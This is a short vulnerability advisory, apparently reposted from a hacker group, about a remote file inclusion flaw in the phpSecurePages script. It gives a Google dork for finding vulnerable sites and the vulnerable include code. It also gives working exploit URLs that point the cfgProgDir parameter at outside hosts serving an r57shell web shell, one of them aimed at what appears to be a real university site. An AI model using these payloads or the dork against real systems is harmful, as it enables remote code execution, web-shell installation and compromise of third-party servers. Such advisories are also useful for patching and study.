SecurityvulnsSECURITYVULNS:DOC:14502phpsecurepages (cfgProgDir) Remote File Include Vulnerability
#==============================================================================================
#phpsecurepages (cfgProgDir) Remote File Include Vulnerability
#===============================================================================================
#Critical Level : Dangerous
#Download from : http://www.comscripts.com/jump.php?action=script&id=1491
#Version : all versions
#================================================================================================
#Google Dork : inurl:"phpsecurepages"
#================================================================================================
#Bug in : /phpSecurePages/secure.php
#Vlu Code :
#--------------------------------
include($cfgProgDir . "lng/" . $languageFile);
include($cfgProgDir . "session.php");
example:http://www.teilar.gr/services/noc/admin/phpSecurePages/secure.php?cfgProgDir=http://d4wood.by.ru/r57shell.php?
#================================================================================================
#Exploit :
#--------------------------------
#http://sitename.com/[Script Path]/secure.php?cfgProgDir==http://sheller.com?
#================================================================================================
#Discoverd By : D_7J
#Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#Special Thx To : Str0ke
#Greetz: All Iranian Hackers